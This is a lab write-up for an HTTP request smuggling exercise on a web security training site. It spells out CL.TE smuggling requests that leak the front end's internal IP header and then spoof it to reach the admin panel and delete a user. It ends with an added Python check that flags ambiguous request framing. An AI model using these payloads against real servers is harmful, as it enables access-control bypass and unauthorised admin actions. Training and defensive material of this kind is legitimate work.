08 - Exploiting HTTP request smuggling to reveal front-end request rewriting
The front end does not support chunked encoding.
If we send this, it still tells us: Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1
POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 144\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin HTTP/1.1\r\n
Host: localhost\r\n
X-Forwarded-For: localhost\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=
POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 144\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin HTTP/1.1\r\n
Host: 127.0.0.1\r\n
X-Forwarded-For: 127.0.0.1\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=\r\n
Since that header does not work, the idea here is to leak the header that the front end adds when it forwards the request to the back end, a header similar to X-Forwarded-For that also serves to spoof the IP.
We take advantage of the search functionality and give the smuggled request a second Content-Length of 120, so that the search result leaks the headers the front end adds:
POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 122\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST / HTTP/1.1\r\n
Host: localhost\r\n
Content-Length: 120\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
search=test
The request that actually arrives at the back end once the normal request is sent would be this:
POST / HTTP/1.1\r\n
Host: localhost\r\n
Content-Length: 120\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
search=testPOST / HTTP/1.1\r\n
X-joelfo-Ip: 90.77.219.74\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net
To solve the lab:
POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 122\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin/delete?username=carlos HTTP/1.1\r\n
Host: localhost\r\n
X-joelfo-Ip: 127.0.0.1\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=
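The requests above only work because the front end frames the body by Content-Length while the back end follows Transfer-Encoding: chunked. As an added example (not part of the original notes), this check parses a request both ways and reports the bytes the two parsers disagree on, which is what a front end or WAF rule can use to reject such requests. The function names and the `lab.example` host are assumptions made for the example, and the sample request is constructed.

```python
# Added example: compare Content-Length framing with chunked framing.

def split_head(raw: bytes):
    """Return (header dict with lower-cased names, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:              # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_end(body: bytes) -> int:
    """Offset just past the terminating chunk, as a chunked parser sees it."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            while True:                               # skip optional trailer lines
                eol = body.index(b"\r\n", pos)
                blank = eol == pos
                pos = eol + 2
                if blank:
                    return pos
        pos += size + 2                               # chunk data plus its CRLF

def framing_report(raw: bytes) -> dict:
    headers, body = split_head(raw)
    cl = headers.get(b"content-length", [])
    te = [v.lower() for v in headers.get(b"transfer-encoding", [])]
    report = {"ambiguous": bool(cl) and bool(te), "leftover": b""}
    if report["ambiguous"] and any(b"chunked" in v for v in te):
        # Bytes a Content-Length parser forwards as body, but a chunked
        # parser leaves in the buffer as the start of the next request.
        report["leftover"] = body[chunked_end(body):int(cl[0])]
    return report

# Constructed sample mirroring the request shape in these notes (placeholder host).
INNER = (b"POST / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 120\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\nsearch=test")
BODY = b"0\r\n\r\n" + INNER
SAMPLE = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
          b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n" + BODY)

if __name__ == "__main__":
    print(framing_report(SAMPLE))
```

A front end that rejects, or rewrites to a single framing, any request reported as `ambiguous` removes the disagreement that the leaked-header trick depends on.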